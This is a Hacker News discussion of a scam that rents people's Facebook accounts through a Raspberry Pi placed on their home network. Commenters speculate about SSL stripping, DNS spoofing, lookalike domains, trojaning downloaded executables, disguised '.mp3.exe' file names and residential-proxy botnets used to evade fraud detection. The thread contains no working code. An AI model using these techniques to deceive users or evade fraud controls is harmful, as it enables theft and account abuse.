> Developers and IT need to work together, not be adversaries.


In the days when USB sticks were more common it was an easy tactic for someone to drop one in a company parking lot labeled “salary data” and with almost certainty that thing would get plugged into a device on the corporate network. The biggest security vulnerability in most cases is still users doing dumb things.

USB sticks are still pretty common.

As are USB stick attacks.


Oh, please, no-one would fall for that! FY2018_salary_data.xls.exe, on the other hand... :P

It wasn't uncommon to see hot_new_song.mp3.exe back in the gnutella heyday.

It's still reasonably common to see hot_new_movie.mp4.exe or have an encrypted mp4 with a install_this_codec.exe beside it.

I made that mistake once when I was a teen. My father was not pleased one bit.

Hidden file extension by default, so users are left wondering "hey why does this song end in .mp3"

Or even hot_new_song.mp3{lots_of_whitespace}.exe

Have USB sticks stopped being common...? I'd guess there are a dozen or two around my house right now.

Many people have started using cloud services for private file sharing. But corporations often ban their use, so employees resort to USB devices.

That's weird, given how USB devices are also often banned so people resort to using online services. I implore people to prefer Airdrop, as it's an encrypted peer-to-peer system. Slack is the easy option, but it's a US based corporation. If you'd pass customer data through Slack you'd already be in violation of local laws.

I don't see how this 'man' in the middle could actually intercept passwords, except for http, but who runs auth over http anyway. For https, the 'man' would have to substitute its own certificate and then the browser / client software wouldn't trust the cert/domain combination without the end user being extremely stupid (and knowledgeable enough to achieve the stupidity).

It could use something like bdfproxy[1] to intercept HTTP-downloaded EXE files, then add some persistent malware in _addition_ to whatever the EXE was doing. This has been done before, over Tor[2].

The malware doesn't have to add a new root certificate, either, though that's completely possible. The Zeus trojan [3] does "man-in-the-browser" to intercept banking information, for example.

[1] https://github.com/secretsquirrel/BDFProxy

[2] https://www.pcworld.com/article/2839152/tor-project-flags-ru...

[3] https://en.wikipedia.org/wiki/Zeus_(malware)

so the spoofer distributing these devices is going to all this trouble/expense/risk in the hope there is a http downloaded exe it can corrupt, then hopes the hashing doesn't fail on that corrupt exe, and hopes the user ignores the untrusted source warning so that it can install a trojan?

How many users do you know of who manually check hashes on downloaded executables?

And of course the user is going to ignore the untrusted source warning on an executable they intentionally downloaded and are trying to run.

I think what he means is that it seems like a lot of trouble to hack someone who is not necessarily hackworthy? Like what kind of things would you expect to gain from someone who would be as computer illiterate as to allow all that to come to fruition?

I agree that $25 / month is more than the average bot is generating. That said, there's a lot of value to many people's computers if properly exploited: https://krebsonsecurity.com/2012/10/the-scrap-value-of-a-hac...

I work on a software company. You would be amazed to know how many manager types, earning 6 figures, who are absolutely naive with regards to security. Those are prime targets for this kind of exploit.

You only have to set this up once, then flash it to each device you're sending out.

These are the same users who connected an untrusted block of hardware directly to their router and presumably gave them a their Facebook login and password.

If you download putty, it comes from an http link. Try it right now

It's ironic given that putty's entire purpose is for dealing with a securely encrypted protocol.

SSL stripping perhaps? There are still plenty of sites that don't implement HSTS, and not all users are vigilant enough to notice when the site they're visiting suddenly doesn't have HTTPS anymore.

Web security has been improving a lot in recent years, but it's not yet at the point where a man in the middle isn't a relevant threat.

You type in http://yourbank.com, your bank respomds with a 301 to https, but this helpful router instead takes you to its phishing site. Lots of people wouldn't notice.

Or it redirects you to https:// yöurbank .com/, and you see the green padlock and think nothing more of it.

Edit: made HN not mangle the link.

I’d like to know which CA would issue an EV cert for a site like that - so I can remove them from my cert stores.

CA's are fully automated, they won't review or check for phishing lookalikes. Maybe reactively if it's being reported, but, should they operate as the internet police? What if it's a legitimate bank that has the same name (with an accent) and isn't beholden to the same trademark in their country?

EV can't be (shouldn't be) fully automated, but:

+ It may seem like it is if your organisation gets a bunch of EV certs with the same organisation info under some bulk deal. The issuer only does the expensive manual EV steps once per period, if you're Google in January then (the thinking goes) you are still Google in June. This saves them money so it enables them to offer pretty good deals for lots of EV certs.

+ Good EV providers streamline the manual stuff in countries like the US that have their government records online. A call centre employee can do the searches, pull up contact details and phone your Head Office or whoever to confirm in minutes not hours. However this also means they won't necessarily pick up on subtle clues like why is this outfit named Myba N K ? Oh! That's My Bank but with misleading capitalisation and spacing.

+ White hats toying with EV discovered that outfits like D&B relied on in the business community to verify identity are... Not very reliable. If D&B says the Head Office is at 632 Wall Street that might be because somebody filled out a web form, not because D&B agents even checked 632 Wall Street exists let alone that the company has offices there...

What about DNS spoofing[1] at the local network level?

[1] https://en.wikipedia.org/wiki/DNS_spoofing

The spoofer wouldn’t be able to obtain a valid certificate for the spoofed site, though.

The spoofer can obtain a valid certificate for another, seemingly legitimate site. Any software that hasn't explicitly pinned the leaf TLS certificates will still accept the (valid) certificate it is redirected to.

And sadly, a lot of software still doesn't perform certificate pinning.

How is this redirect performed?

When a URL is manually typed in, and HSTS or HSTS-preloading isn't enabled, the initial 301 redirect would be http.

It could just be a 3xx redirect over clear http, right? The http site can redirect to a https site with a similar name.

it might redirect to a malicious web page, but https would still prevent a problem. perhaps read the article you posted.

Only if they are serving HTTPS or HTTPS is pinned. Otherwise, aren't you relying on the user noticing the lack of HTTPS (which I wouldn't want to do)?

The user can just be redirected to another similar looking site with a valid TLS certificate.



This will seem like a valid website, especially if the phishing site is done well. Not just non-technical users, I'd wager some tech familiar users would be fooled too.

The focus always being on the lock icon might not always cover it.

Safari will prevent this though.

Isn't that why browsers visually distinguish the TLD and the part before it from the rest of the URL?

SSL/TLS downgrade attack when HSTS is not enabled.

What are the odds that someone dumb enough to install this would be scared off by an insecure site warning?

I think Chrome for a while has simply refused to let you visit a page when there's an SSL problem (at least for certain types of problems), which seems like a reasonable solution to the "people will just ignore warnings" problem.

Whilst it's certainly a scam to do with advertising [0], I doesn't look like there's any evidence that the scam has anything to do with 'stealing' anything from network / network traffic:

> Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.

[0] https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...

I find these claims extremely dubious. Everything they claim the Pi is needed for can be accomplished without the equipment and postage costs with a purely software solution; The hardware allows them to monitor all traffic and avoid antivirus/firewalls. Moreover, I doubt it is difficult to find mass-market Facebook accounts for much less than $15/month - it is far more likely that, given the hardware allows them unfettered access to all network traffic, it is designed to report back as much data as possible, ideally including plaintext passwords and banking information.

In this case, having a distributed botnet of Pis at people's houses would make sure you didn't get IP blocked by Facebook, since there are also legitimate users at that IP. Facebook probably would not block it, and even if it did unplugging and plugging back in the modem is enough for most residential gateways to get a new external IP.

The hardware gives a better guarantee of botnet uptime though. If you want it to be powered on and attached to that network 24/7, you can't rely on their laptop/desktop.

>Why do you need my account? Why not use your own? We have plenty of our own accounts. We need you because no matter how many accounts we have internally, Facebook limits the amount we can spend per account. By working with people like you, we are able to scale our business.

Can somebody explain if this makes sense? Why are there limits on account spending?

Because the ad spends are fraudulent in nature? Just a guess.

No, but if you accept the answer, you get $15.

probably using stolen CC's to buy ads

Look lower down that thread for the FAQ from the company: they're using the roommate's Facebook account to purchase targeted ads on Facebook in order to evade Facebook's internal controls. https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...

The first comment in the thread you link to says the Raspberry Pi connects to botnets and records all network traffic.

> It records EVERY KEYSTROKE sent of the network, even SSL connection.

One wonders how it does that.

A microphone and some basic ML?

Sort of tongue in cheek, since I don't know the range of state of the art acoustic side-channel taps. I guess you'd also probably have power fluctuations and network timing channels to exploit.

Plus, a lot of different points at which to attempt to insert a second stage into the connected devices themselves, using all the tricks everyone else in this thread has mentioned.

I think that just means it records everything sent over the network.

I wish he would not destroy it and send to a security researcher to identify what it really does and what information is collected.

If I had to guess, it's providing VPN endpoint/relay services to scammers (CC fraud, etc) who need actual residential IPs to buy things from. Or to use to set up accounts/sockpuppet accounts for things like automated reddit vote manipulation.

It's obviously located "inside" the residential end user's router/NAT, on their wifi, so it'll have something like an openvpn or ipsec daemon on it that initiates a connection to an endpoint elsewhere on the internet, building a tunnel for the botnet operators to control it remotely. Or via tor to a tor hidden service somewhere, like many purely software trojan botnets for win32/win64, but in this case it will have the vpn or tor binaries running on its own dedicated raspberry-pi class device.

If you have a botnet of several thousand devices which can be made to look indistinguishable from legitimate "ordinary non technical user sitting at home on their comcast connection with their laptop or tablet", you can do all sorts of things. Relay http/https traffic for a click farm in Bangladesh where people are upvoting reddit comments en masse to promote a product, sockpuppet facebook account comments for political campaigns and pushing political agendas (russian internet research agency, anyone?), etc. The goal here is to make the traffic look like legit single end user residential internet traffic and not traffic that's coming from netblocks of major colocation/dedicated server/VPS/VM hosting companies, whose ARIN/RIPE/APNIC space is all documented as such.

There's fraud detection systems which will trigger if you're trying to buy something like amazon gift cards from a /20 netblock of an ISP in Bulgaria, but are less "suspicious" if your traffic and useragent, etc, are all coming from a Frontier, Centurylink, Comcast etc netblock in a major American city. Stuff like the maxmind geolocation data correlating closely with the billing zipcode/shipping zip code of what you're trying to buy with a stolen credit card, or other identify theft type scams.

If you're doing some variation on a massive vote manipulation service, there's also fraud/botnet detection systems which will trigger on large volumes of upvotes (or similar manipulation) all coming from the same geographical location and netblocks. Your traffic look more like legitimate end users if it is geographically distributed across many states and provinces, many english-speaking countries (AU, NZ, CA, UK, etc), and across many ISPs and several different common end user browser useragents (edge, chrome, firefox, etc). Imagine if you threw 500 darts at a map of the USA on a wall and distributed all your botnet devices randomly around the map, vs having 300 devices all on the same network in the Chicago metro area, for instance.

There are companies out there that offer proxies from 'real' US resident IP addresses. I think these companies use tactics like this to be able to offer real residential IPs (and not IP ranges belonging to hosting companies)

This is the first one that came up on google - https://stormproxies.com/ - I'm not saying that specific company is in any way related to this device or tactic (it is just the first on google for 'residential address ip proxy', but I think it is companies similar to this that will pay people for access to their routers and sell that access.

What I find noteworthy about that stormproxies website is that unlike any sort of legit ISP, there's no information on what company is actually behind it, phone number, mailing address/street address, etc. I bet if you played follow the money with its credit card payments the money goes to a bank account in Cyprus or something.

It's a slick html template and some marketing text masquerading in front of a service obviously sold to greyhat/blackhat end users.

(perspective: I work for a legit ISP that has real things that physically exist in many POPs at layer 1 in the OSI model).

Luminati.io merely uses the Hola extension to power a massive residential IP network. Hardware is so 2000.

They've gone well beyond the extension now. These days you have no idea if that "free" app you've installed has made a deal with Luminati to sell your bandwidth to the highest bidder. They also have an Android SDK too. I've received several emails like the following:

> My name is Lior and I lead the SDK partnerships at Luminati.​ I assume your

> software earns money by charging users for a premium subscription or by showing

> ads - both models do not pay out much and harm the user experience.


> We now offer you a third option.


> Luminati’s monetization SDK for Windows desktop provides your users the option

> to use the software for free, and in exchange we pay you $30,000 USD per month,

> for every 1M daily active users.

> More information is available on http://luminati.io/sdk_win.

That is sketchy and unethical as fuck.

I would like to give them an A+ rating for whatever graphic artist drew their artwork and did the CSS/webpage layout, however.

I dunno, to me the icon is reminiscent of the Hades character from the Disney movie: https://vignette.wikia.nocookie.net/disney/images/c/cf/Hercu...

3 cents per user per month. Is that right?

Is it hard to make 3 cents a month from a user?

3 cents more than what you were making before. It's free money

This is honestly a pretty neat idea. Don't get me wrong, it's sketchy as hell and I'm sure gets abused, but residential proxies... well played.

The other big player is Hola.

This is almost certainly the right answer.

Applications are open for YC Winter 2022

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact